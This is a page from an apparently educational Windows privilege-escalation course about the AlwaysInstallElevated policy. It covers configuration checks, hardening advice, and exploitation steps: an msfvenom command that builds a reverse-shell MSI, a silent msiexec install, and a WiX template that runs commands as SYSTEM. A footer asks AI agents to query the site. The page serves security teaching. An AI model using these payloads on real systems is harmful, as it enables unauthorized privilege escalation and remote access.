# 10 - Always Install Elevated

#### Topics <a href="#topics" id="topics"></a>

> 1. Introduction to the Windows Shells
> 2. Windows Permissions
> 3. Reverse Shells in Windows
> 4. SeImpersonatePrivilege Exploitation
> 5. On Cross Compilation
> 6. Windows Services
> 7. Weak Service Permissions
> 8. Unquoted Service Path
> 9. DLL Hijacking
> 10. Always Install Elevated
> 11. Files with Sensitive Data
> 12. Windows Hashes
> 13. Stored Credentials and the Windows Vault
> 14. Scheduled Task
> 15. Critical Registry Paths
> 16. Useful Tools
> 17. AMSI Bypass

## **Always Install with Elevated Privileges**

The **"Always Install with Elevated Privileges"** policy in Windows allows users to install software with elevated permissions, even if they are not administrators. This setting applies to both **Computer Configuration** and **User Configuration** policies.

**Security Risks**

* Malicious actors can exploit this setting to execute arbitrary code during software installation.
* If enabled, it creates a significant security vulnerability, potentially leading to privilege escalation.

***

## **Configuration Check**

### **Using Group Policy Editor**

You can check this setting in the **Group Policy Editor** (`gpedit.msc`):

1. Navigate to:
   * **Computer Configuration** → Administrative Templates → Windows Components → Windows Installer → "Always install with elevated privileges."
   * **User Configuration** → Administrative Templates → Windows Components → Windows Installer → "Always install with elevated privileges."
2. Ensure the policy is **disabled** to prevent misuse.

### **Using PowerShell**

To verify the configuration via PowerShell:

```powershell
Get-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows\Installer" -Name AlwaysInstallElevated
Get-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\Installer" -Name AlwaysInstallElevated
```

If both values are set to `1`, the policy is active.

**Set the Policy**

To enable or disable the policy via PowerShell:

```powershell
# Enable the policy (dangerous)
Set-ItemProperty -Path 'HKLM:\Software\Policies\Microsoft\Windows\Installer' -Name 'AlwaysInstallElevated' -Value 1
Set-ItemProperty -Path 'HKCU:\Software\Policies\Microsoft\Windows\Installer' -Name 'AlwaysInstallElevated' -Value 1

# Disable the policy (recommended)
Set-ItemProperty -Path 'HKLM:\Software\Policies\Microsoft\Windows\Installer' -Name 'AlwaysInstallElevated' -Value 0
Set-ItemProperty -Path 'HKCU:\Software\Policies\Microsoft\Windows\Installer' -Name 'AlwaysInstallElevated' -Value 0
```

***

#### **3. Exploitation**

If this policy is enabled, attackers can generate and install a malicious Microsoft Software Installer (`.msi`) package to gain elevated privileges.

**Generate Malicious MSI with msfvenom**

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.122.1 LPORT=7777 -f msi > sample.msi
```

**Install the Malicious Package**

```bash
msiexec /quiet /qn /i sample.msi
```

This executes the payload embedded in the MSI file with elevated privileges.

***

## **Creating a Custom MSI**

Instead of using `msfvenom`, you can create a custom MSI with the **WiX Toolset** to execute specific commands or scripts during installation.

### **Steps to Create a Custom MSI**

1. **Download WiX Toolset**
   * Download WiX v3.14.1 from [WiX Releases](https://github.com/wixtoolset/wix3/releases/tag/wix3141rtm).
2. **Install and Update PATH**\
   Add WiX binaries to your system path:

   ```cmd
   set PATH=%PATH%;"C:\Program Files (x86)\WiX Toolset v3.14\bin"
   ```
3. **Create the WiX Project File**\
   Example `sample.wxs` file:

   ```xml
   <?xml version="1.0"?>
   <Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
     <Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name"
              Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
       <Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
       <Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>
       <Directory Id="TARGETDIR" Name="SourceDir">
         <Directory Id="ProgramFilesFolder">
           <Directory Id="INSTALLLOCATION" Name="Example">
             <Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
             </Component>
           </Directory>
         </Directory>
       </Directory>
       <Feature Id="DefaultFeature" Level="1">
         <ComponentRef Id="ApplicationFiles"/>
       </Feature>
       <Property Id="cmdline">cmd.exe /C whoami /groups > C:\Users\Quickemu\Desktop\test.txt</Property>
       <CustomAction Id="Stage1" Execute="deferred" Directory="TARGETDIR" ExeCommand='[cmdline]' Return="ignore" Impersonate="no"/>
       <CustomAction Id="Stage2" Execute="deferred" Script="vbscript" Return="check">
         fail_here
       </CustomAction>
       <InstallExecuteSequence>
         <Custom Action="Stage1" After="InstallInitialize"></Custom>
         <Custom Action="Stage2" Before="InstallFiles"></Custom>
       </InstallExecuteSequence>
     </Product>
   </Wix>
   ```
4. **Compile the WiX Project**\
   Convert the `.wxs` file into a `.wixobj` and then into an MSI file:

   ```bash
   candle sample.wxs
   light.exe sample.wixobj
   ```
5. **Execute the Custom MSI**

   ```bash
   msiexec /quiet /qn /i sample.msi
   ```

***

## **Recommendations**

* **Disable the Policy**: Ensure the `Always Install with Elevated Privileges` policy is disabled in both **HKLM** and **HKCU**.
* **Audit Installer Files**: Regularly review MSI packages for malicious content.
* **Restrict Permissions**: Limit access to installer execution to trusted users only.

***

## Other Resources

* [WiX Toolset Official Site](https://wixtoolset.org/)
* [WiX Elevated Install Guide](https://www.add-in-express.com/forum/read.php?FID=5\&TID=13992)

{% hint style="danger" %}
**Disclaimer**

**❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization!**❗
{% endhint %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://dev-angelist.gitbook.io/windows-privilege-escalation/10-always-install-elevated.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.